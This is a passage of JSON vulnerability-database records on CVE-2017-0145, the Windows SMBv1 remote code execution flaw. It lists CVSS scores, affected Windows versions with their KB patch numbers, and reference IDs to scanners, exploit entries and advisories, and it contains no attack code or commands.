2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-06T10:43:29", "differentElements": ["msAffectedSoftware"], "edition": 15}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-06T12:49:42", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-06T12:49:42", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-06T12:49:42", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3212646", "KB4012217", "KB3177186", "KB3205409", "KB3210720", "KB4012213", "KB3210721", "KB3205401", "KB4012212", "KB3213986", "KB4012214", "KB4014077", "KB4012598", "KB4012216", "KB4013198", "KB4013429", "KB4012215", "KB4012606", "KBMS16-110, 3187754"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-06T12:49:42", "differentElements": ["msAffectedSoftware"], "edition": 16}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-06T16:54:11", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-06T16:54:11", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-06T16:54:11", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012215", "KB4013429", "KB4012213", "KB4012217", "KB4012216", "KB4012214", "KB3210721", "KB4014077", "KB3213986", "KBMS16-110, 3187754", "KB3177186", "KB4013198", "KB4012606", "KB3210720", "KB4012212", "KB3212646", "KB3205401", "KB4012598", "KB3205409"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", 